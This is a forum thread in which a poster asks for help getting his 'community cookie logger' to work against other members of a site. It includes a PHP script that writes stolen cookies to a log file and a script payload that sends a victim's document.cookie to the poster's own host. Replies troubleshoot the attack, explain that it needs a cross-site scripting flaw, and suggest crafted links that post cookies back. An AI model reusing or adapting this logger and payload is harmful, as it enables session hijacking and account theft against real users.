Jump to content

Recommended Posts

Posted

Hey everyone.

Im trying to set up a community cookie logger.

Ive created a cookielogger.php containing

$filename = "logfile.txt";
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, 'a'))
{
echo "Temporary Server Error,Sorry for the inconvenience.";
exit;
}
else
{
if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
{
echo "Temporary Server Error,Sorry for the inconvenience.";
exit;
}
}
echo "Temporary Server Error,Sorry for the inconvenience.";
fclose($handle);
exit;
}
echo "Temporary Server Error,Sorry for the inconvenience.";
exit;
?>

Then, an emtpy logfile.txt

And a file called meal.gif containing

<script>location.href='http://masque.myhost.net/cookielogger.php?cookie='+escape(document.cookie)</SCRIPT>

The files look like the following:

/htdocs/cookielogger.php

/htdocs/logfile.txt

/htdocs/meal.gif

Read and Write permissions on logfile.txt are enabled (7777). But somehow, the file is after a visit of a community member still empty.

Could someone help me with that?

Thanks!

Benny

Posted

Unless you cna find a cross site scripting flaw in the site your trying to steal cookies from, or in the users browser itself, you are not going to be able to download all their cookies by simply having them view your site. The only cookie you would be able to get this way is one set by your own site.

Now, if you could insert some code that ran on someone elses site and wrote the cookies back to your servers, then you might have the chance to steal something, but only if they fall victim to xss vulnerabilities. Iframes won't work either, since the iframe would be cookies from your site, not the target site. Javascript is your best bet, or if you could post back to your php file on your site with a form or javascript link embedded on their site.

Posted

Other than what Digip pointed out,

You have typo:

{

if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)

{

Atleast I think that there should not be three (3) "=" marks, two (2) should mean equal.

and shouldn't you specify name of the cookie you are trying to get?

Sorry if my post is complete bs.

Posted
Other than what Digip pointed out,

You have typo:

Atleast I think that there should not be three (3) "=" marks, two (2) should mean equal.

and shouldn't you specify name of the cookie you are trying to get?

Sorry if my post is complete bs.

You can get the cookie with javascript simply by typing into your toolbar the following

java script:alert(document.cookie);

Just take out the spaces the forums put in the code. If you were stealing cookies, you can use something similar to contruct a URL people can click on and make it post back the cookie to some cgi or php script on your own server. If they were dumb enough, you could make an email url and have them send it to you directly. Its whether or not the target site you want the cookies from is vulnerable to xss though, and if they allow you to post javascript or other code into their pages.

Posted
Read and Write permissions on logfile.txt are enabled (7777).

You set a file facing the Internet to 7777 with that code you provided? That's awesome, can I go ahead and get your IP address? Thanks :)

Posted

The file permissions should be 0777 not 7777

And your not going to really be able to modify the files being presented on the HTTPd,

Unless you find a exploit.

Posted
The file permissions should be 0777 not 7777

And your not going to really be able to modify the files being presented on the HTTPd,

Unless you find a exploit.

I hope you weren't responding to me since your post is completely incorrect.

Posted

Yes I was responding to you,

Please explain?

Posted
The file permissions should be 0777 not 7777

And your not going to really be able to modify the files being presented on the HTTPd,

Unless you find a exploit.

Well, there's a lot wrong here. Without going into too many details or wanting to argue, let's just take your statements and debunk them.

Given the code:

Ive created a cookielogger.php containing

$filename = "logfile.txt";
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, 'a'))
{
...
}
else
{
if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
{
...
}
}
...
?>

You simply give him a page with a correct cookie value and its written to the file. That file is served by httpd. So "And your not going to really be able to modify the files being presented on the HTTPd" is an incorrect statement.

Let's look at your first statement about the file permissions. Why do you need the setuid, sticky, setgid, and execute permissions set? It's a security risk. So that statement is wrong as well.

Yes, I think I see what you meant to say about the exploitation. But you didn't, and your statements are therefore incorrect like I said.

The details about how I would gain entry to such a system are beyond the scope of this argument. If you ask me really nicely I might try to help you out if you set up such a box for me to gain entry to. Really though, if you can't see any problems with the presented vulnerabilities then you should pick up a book on security.

Start simple, go with the Hacking Exposed books.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...